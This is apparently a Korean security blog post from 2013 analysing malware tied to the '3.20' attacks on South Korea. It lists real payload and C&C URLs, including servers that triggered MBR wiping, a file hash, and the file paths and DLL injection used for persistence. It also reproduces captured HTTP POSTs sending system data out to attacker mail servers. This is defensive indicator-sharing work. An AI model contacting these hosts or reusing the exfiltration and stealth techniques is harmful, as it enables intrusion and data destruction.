태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

악성코드제작자2013.06.02 12:48


3.20 공격의 연장선인 2013년 3월 25일 날씨닷컴에서 사용된 정보수집 메일


https://www.facebook.com/cyberwar15 


nalsee.com/scripts/blank_image.js

mb_join.gif

http://www.ewmail.net:32000/mail/skin/Xecureweb_update.gif 

LGservc.exe

Xecureweb_update.gif (복호화된 pe)
ㄴwww.dobike.net/bbs/img/logo.jpg (pe) - ec887c65ed4b57ebcd535a3d065ec9eb

schedsrv.dll

 

 

 

sort.html 은 명령을 수신하는 C&C로도 사용되었으며, 공격자 명령에 따라 임시폴더에 ~09183.tmp 라는 파일을 받고, 조건에 의해서 MBR 파괴기능을 수행하였다.

 

날씨닷컴 등에 의해서 설치된 악성파일의 C&C


http://webmail.metronic-group.com/mail/sort.html
http://webmail.imaginex.com.hk/mail/sort.html
http://webmail.svenskawebb.se/sort.html
http://webmail.impulstanz.com/mail/sort.html
http://webmail.victopharma.com.vn:32000/mail/sort.html

2013년 05월 31일에 발견된 정보수집 메일

 

http://www.icfc.or.kr/upload/2011122816281861_jsp.jsp?q=C0A81565189E005051CD2FD86B83D2C11D49FEDA12FD22;RQ9//5/uFk5jEaEd7mkJyJR8MiQzprGTCBgdyJ0Ac4bPjctwf4nCQilOQ1JmNVomGvRlKdMaybWUa7pFuHmt/3RDgY4Yu2%2BXM7RwpIkhSRk%3D%3Becs4%2BjpzBQj8FSM%2B4Clzk1pxWd4%3D

POST /upload/2011122816281861_jsp.jsp?q=C0A81565189E005051CD2FD86B83D2C11D49FEDA12FD22;RQ9//5/uFk5jEaEd7mkJyJR8MiQzprGTCBgdyJ0Ac4bPjctwf4nCQilOQ1JmNVomGvRlKdMaybWUa7pFuHmt/3RDgY4Yu2%2BXM7RwpIkhSRk%3D%3Becs4%2BjpzBQj8FSM%2B4Clzk1pxWd4%3D HTTP/1.1
User-Agent: Molliza /4.0 (compatible; ******Web Ctl)
Host: www.icfc.or.kr
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=232969222.76267358.1370046134.1370046134.1370046134.1; __utmb=232969222.1.10.1370046134; __utmz=232969222.1370046134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) 

 

생성 C:\Program Files\SoftForum\XecureWeb\ActiveX\temp\sxs.dll - 2013.05.30 03:54:37 UTC -> 05.30 12:54 KST
복사 C:\Program Files\Internet Explorer\sxs.dll

삭제 C:\Program Files\SoftForum\XecureWeb\ActiveX\temp\sxs.dll

 

파일 C:\Program Files\Internet Explorer\sxs.dll (MoveFileA)
변경 C:\Program Files\Internet Explorer\pbn.dll

 

sxs.dll 파일을 IE 폴더에 생성해서 IE 작동시까지 잠복기를 거치도록 만들고, 이후 추적할 수 있는 체인을 끊을 수 있다. sxs.dll 이 작동되면 icon_03.gif 악성파일이 설치되는데, 그 이후에 icon_03.gif 가 들어온 경로를 찾는게 어렵기 때문이다.


API 함수 암호화 0x04


 

다운 http://augustine.co.kr/bbs/img/icon_03.gif


생성 C:\Documents and Settings\user\Local Settings\Temp\kbdusv.exe - 2013.05.30 23:58:51 UTC -> 05.31 08:58 KST

생성 C:\Windows\System32\snddev.dll (winlogon.exe dll injection/handle) - 2013.05.29 15:48:05 UTC -> 05.30 24:48 KST


삭제 C:\Documents and Settings\user\Local Settings\Temp\kbdusv.exe

systeminfo.exe 을 통해서 로그생성

 

유출시도되는 로그는 임시폴더에 ~2469.tmp 와 같은 형식으로 만들어짐.

 

 

IP : 12.69.41.2 (mail.hallauto.com / 미국)
POST /mail/menu.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)
Host: mail.hallauto.com
Content-Length: 67
Connection: Keep-Alive
Cache-Control: no-cache

image=1&no=0&num=IC911A11&id=A5714183A8C0000000000000&date=dae965e6

-----------------------------6e8fad908fe13c
Content-Disposition: form-data; name="upfile"; filename="title.gif"
Content-Type: application/octet-stream

 

 

기존에 사용하던 Hash 값에서 변경이 되었다. 기존까지 주로 이용되던 값은 아래와 같다.

 


Posted by viruslab